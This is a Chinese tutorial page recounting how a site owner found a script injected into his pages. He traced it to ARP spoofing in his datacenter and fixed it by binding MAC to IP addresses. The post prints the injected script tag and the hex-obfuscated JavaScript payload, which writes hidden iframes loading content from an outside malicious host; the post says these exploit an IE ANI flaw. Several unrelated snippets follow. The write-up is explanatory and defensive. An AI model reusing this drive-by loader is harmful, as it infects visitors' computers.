网站被黑的假象--ARP欺骗之页面中加入一段js

2016-02-19 09:35 27 1 收藏

给自己一点时间接受自己,爱自己,趁着下午茶的时间来学习图老师推荐的网站被黑的假象--ARP欺骗之页面中加入一段js,过去的都会过去,迎接崭新的开始,释放更美好的自己。

【 tulaoshi.com - Web开发 】

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
script src=http://fuck.ns2go.com/dir/index_pic/1.js/script

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:
代码如下:

window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x31x2ex67x69x66'x29"x3e"); 
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x32x2ex67x69x66'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e"); 
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x30x36x30x31x34x2ex68x74x6d x77x69x64x74x68x3dx31 x68x65x69x67x68x74x3dx31x3ex3c/x69x66x72x61x6dx65x3e"); 
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x74x6ax2ex68x74x6d x77x69x64x74x68x3dx30 x68x65x69x67x68x74x3dx30x3ex3c/x69x66x72x61x6dx65x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1

来源:http://www.tulaoshi.com/n/20160219/1591341.html

延伸阅读
标签: PHP
<?php   $key = "This is supposed to be a secret key !!!";   function keyED($txt,$encrypt_key)   {   $encrypt_key = md5($encrypt_key);   $ctr=0;   $tmp = "";   for ($i=0;$i<strlen($txt);$i++)   { ...
标签: ASP
function mis(preString) Dim texts Dim seed Dim i,length prestring = trim(preString) length = len(preString) seed = length texts = "" for i = 1 to length seed = int(94*rnd(-asc(mid(preString,i,1))-seed*asc(right(prestring,1)))+32) texts = texts & chr(seed) & chr(int(94*rnd(-seed)+32)) next dim dist dist="" for i...
标签: 电脑入门
如需查找您在几天前、几周前甚至几个月前访问过、但又不曾添加到Favorites(收藏夹)内的Web页面,则请在Windows XP中借助Internet Explorer 6所提供的History(历史记录)列表进行追溯。单击工具栏上的History(历史)按钮,浏览器便会显示出历史记录,并提供与您今天、昨天、前天和此前三周所访问过的每个页面相对应的快捷方式。这些链接将按...
Win7下如何清除arp缓存防止被arp攻击和arp欺骗   方法一、 1、打开运行对话框,然后输入CMD打开命令提示符提示框; 2、在打开的窗口中输入arp -a(p和-之间有一个空格),显示所有接口的当前ARP缓存表(上网一段时间后就会出现); 3、接着在窗口中输入arp -d,清除ARP缓存→输入arp -a  查看ARP缓存列表,然后重...
标签: Web开发
网页中的图片变动的效果 直接粘贴到浏览器地址栏里运行就可以看到效果了 记得先打开个图片多的页面 代码如下: javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){f...

经验教程

58

收藏

89
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部